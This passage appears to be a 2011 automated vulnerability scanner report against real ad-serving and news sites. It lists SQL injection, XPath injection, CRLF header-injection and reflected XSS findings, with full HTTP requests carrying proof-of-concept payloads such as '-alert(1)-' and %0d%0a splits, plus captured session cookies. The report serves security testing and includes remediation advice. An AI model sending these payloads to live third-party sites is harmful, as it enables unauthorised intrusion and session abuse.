The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 03 Oct 2011 00:37:28 GMT
Server: Apache/2.2.3 (CentOS)
ntCoent-Length: 617
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 617

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 2

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 00:37:28 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: max-age=0
Content-Length: 0
Cache-control: no-cache
Location: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html; charset=UTF-8


1.24. http://www.revresda.com/event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.revresda.com
Path:   /event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 03 Oct 2011 00:37:26 GMT
Server: Apache/2.2.3 (CentOS)
ntCoent-Length: 617
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 617

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 2

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 00:37:27 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: max-age=0
Content-Length: 0
Cache-control: no-cache
Location: http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html; charset=UTF-8


2. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-15.js

Issue detail

The put_2101 cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the put_2101 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /a/7743/12359/21900-15.js?cb=0.14229151024483144 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1'; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; rdk9=0; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; rdk=7743/12359; rdk2=0; ses2=13378^2&12566^2&12359^1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:00:29 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 01:00:29 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 01:00:29 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^3&12566^2&12359^68; expires=Tue, 04-Oct-2011 04:59:59 GMT; max-age=115170; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3348

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
et/adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDsOhDAMBa.CXG8kEjv.7G1iCBWio1rt3bGpPCM9zw8Q4buYUrXPAthCVDo1Dash4OtwZrNCm4xCenixbVjZlX2XOetsDvmaY.ltlbTsZLDHRX5rFHjd5xnIgbUTivwfI_ccIA--&redirectURL=;ord=b0ab6699-4c7a-48fb-9ca9-d86bd7ee1e2b?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSP
...[SNIP]...

3. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 941ce%0d%0af56167da7a4 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1517119;host=nike.112.2o7.net%2Fb%2Fss%2Fnikefootballglobal%2Cnikeall%2F1%2FH.22.1%2Fs93092863939236%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D27447D5405012A65-6000010FA00F4A54%26%26ndh%3D1%26t%3D2%252F9%252F2011%252018%253A58%253A28%25200%2520300%26vmt%3D4DCC71DA%26vmf%3Dnike.112.2o7.net%26ce%3DUTF-8%26ns%3Dnike%26pageName%3DGLSC%253Elang_selector%253Emain%26g%3Dhttp%253A%252F%252Fwww.nike.com%252Fnikeos%252Fp%252Fnikefootball%252Flanguage_tunnel%253Flid%253Dnikebutton%26r%3Dhttp%253A%252F%252Fwww.manutd.com%252FSearch-Results.aspx%253Fqs%253Dmanutd_frontend%2526catTxt%253D%2526searchText%253Dxss75931%25253Cscript%25253Ealert%28document.location%29%25253C%252Fscript%25253E14fb8fbf954%26vvp%3DDFA%25231517119%253Av49%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dsoccer%26server%3Dnikefootballglobal%26events%3Devent13%26v5%3DD%253DUser-Agent%26c18%3Dlanguage_selector%26c24%3DD%253DUser-Agent%26c26%3DD%253Dg%26v48%3DD%253DpageName%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1074%26bh%3D906%26p%3DShockwave%2520Flash%253BQuickTime%2520Plug-in%25207.7%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BSilverlight%2520Plug-In%253BMicrosoft%2520Office%25202010%253BRemoting%2520Viewer%253BNative%2520Client%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Earth%2520Plugin%253BGoogle%2520Updater%253BGoogle%2520Update%253BiTunes%2520Application%2520Detector%253BWPI%2520Detector%25201.4%253BDefault%2520Plug-in%253B%26AQE%3D1941ce%0d%0af56167da7a4&A2S=1;ord=1732731727 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://nike.112.2o7.net/b/ss/nikefootballglobal,nikeall/1/H.22.1/s93092863939236?AQB=1&vvpr=true&&pccr=true&vidn=27447D5405012A65-6000010FA00F4A54&&ndh=1&t=2%2F9%2F2011%2018%3A58%3A28%200%20300&vmt=4DCC71DA&vmf=nike.112.2o7.net&ce=UTF-8&ns=nike&pageName=GLSC%3Elang_selector%3Emain&g=http%3A%2F%2Fwww.nike.com%2Fnikeos%2Fp%2Fnikefootball%2Flanguage_tunnel%3Flid%3Dnikebutton&r=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954&vvp=DFA%231517119%3Av49%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=soccer&server=nikefootballglobal&events=event13&v5=D%3DUser-Agent&c18=language_selector&c24=D%3DUser-Agent&c26=D%3Dg&v48=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1941ce
f56167da7a4
&A2S=1/respcamphist;src=1517119;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1317599960:
Date: Sun, 02 Oct 2011 23:59:20 GMT
Server: GFE/2.0
Content-Type: text/html


3.2. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap [476949646137654800&c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kantarmedia.guardian.co.uk
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the 476949646137654800&c request parameter is copied into the Set-Cookie response header. The payload 958bb%0d%0aa655d8051a4 was submitted in the 476949646137654800&c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?476949646137654800&c=958bb%0d%0aa655d8051a4&e=14d HTTP/1.1
Host: kantarmedia.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html?054612530__!__http://kantarmedia.guardian.co.uk__!__&Paneled_Site=guardian.co.uk&Paneled_Section=football
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:52:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 958bb
a655d8051a4
=0; expires=Sun, 16-Oct-11 23:52:08 GMT; path=/; domain=.guardian.co.uk
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


4. Cross-site scripting (reflected)
There are 435 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5693a'-alert(1)-'88333851b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian5693a'-alert(1)-'88333851b7a/;sz=728x90;ord=$random$? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Sun, 02 Oct 2011 23:51:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:12 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian5693a'-alert(1)-'88333851b7a/;sz=728x90;net=cm;ord=$random$;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.2. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddccb'-alert(1)-'fb58dd8594f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?&ddccb'-alert(1)-'fb58dd8594f=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sun, 02 Oct 2011 23:51:10 GMT
Connection: close
Vary: Accept-Encoding
